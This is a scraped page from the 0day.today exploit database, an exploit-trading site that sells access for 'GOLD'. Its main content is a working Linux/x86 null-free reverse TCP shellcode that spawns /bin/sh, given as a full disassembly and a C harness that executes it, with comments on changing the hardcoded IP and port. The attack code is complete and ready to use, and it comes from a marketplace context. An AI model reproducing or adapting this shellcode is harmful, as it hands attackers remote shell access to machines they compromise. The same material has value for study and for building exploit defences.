0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes)
/* Title: Linux/x86 - Reverse TCP Shell (/bin/sh) (127.1.1.1:8888/TCP) Null-Free Shellcode (69 bytes) Description: Smallest /bin/sh Reverse TCP Shellcode(Null Free, No Register Pollution Required) Date : 4/Jan/2018 Author: Nipun Jaswal (@nipunjaswal) ; SLAE-1080 Details: Smallest /bin/sh based Null & Register Pollution Free x86/linux Reverse Shell TCP (127.1.1.1:8888)( 69 Bytes ) You can modify the port and IP by changing the values for IP and PORT Note: If You are compiling the C file itself and dont care about Bad Chars, You can reduce 2 more bytes: Change the following lines of code: push word 0xb822 push word 2 To: push 0xb8220002 ---> This will make the length of the Shellcode to 67 Bytes */ /*Disassembly of section .text: 08048060 <_start>: 8048060: 31 db xor ebx,ebx 8048062: 53 push ebx 8048063: 43 inc ebx 8048064: 53 push ebx 8048065: 6a 02 push 0x2 8048067: 89 e1 mov ecx,esp 8048069: 6a 66 push 0x66 804806b: 58 pop eax 804806c: cd 80 int 0x80 804806e: 93 xchg ebx,eax 804806f: 59 pop ecx 08048070 <loop>: 8048070: b0 3f mov al,0x3f 8048072: cd 80 int 0x80 8048074: 49 dec ecx 8048075: 79 f9 jns 8048070 <loop> 8048077: 68 7f 01 01 01 push 0x101017f 804807c: 66 68 22 b8 pushw 0xb822 8048080: 66 6a 02 pushw 0x2 8048083: 89 e1 mov ecx,esp 8048085: b0 66 mov al,0x66 8048087: 50 push eax 8048088: 51 push ecx 8048089: 53 push ebx 804808a: b3 03 mov bl,0x3 804808c: 89 e1 mov ecx,esp 804808e: cd 80 int 0x80 8048090: 52 push edx 8048091: 68 2f 2f 73 68 push 0x68732f2f 8048096: 68 2f 62 69 6e push 0x6e69622f 804809b: 89 e3 mov ebx,esp 804809d: 52 push edx 804809e: 53 push ebx 804809f: 89 e1 mov ecx,esp 80480a1: b0 0b mov al,0xb 80480a3: cd 80 int 0x80 EDB Note: Source ~ http://www.nipunjaswal.com/2018/01/tale-of-the-smallest-shellcode.html */ #include<stdio.h> #include<string.h> #define IP "\x7f\x01\x01\x01" #define PORT "\x22\xb8" int main(int argc, char* argv[]) { unsigned char code[] = \ "\x31\xdb\x53\x43\x53\x6a\x02\x89\xe1\x6a" "\x66\x58\xcd\x80\x93\x59\xb0\x3f\xcd\x80" "\x49\x79\xf9\x68" IP "\x66\x68" PORT "\x66\x6a\x02\x89\xe1\xb0\x66\x50" "\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68" "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89" "\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; printf("\nShellcode 1 Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); } # 0day.today [2024-09-28] #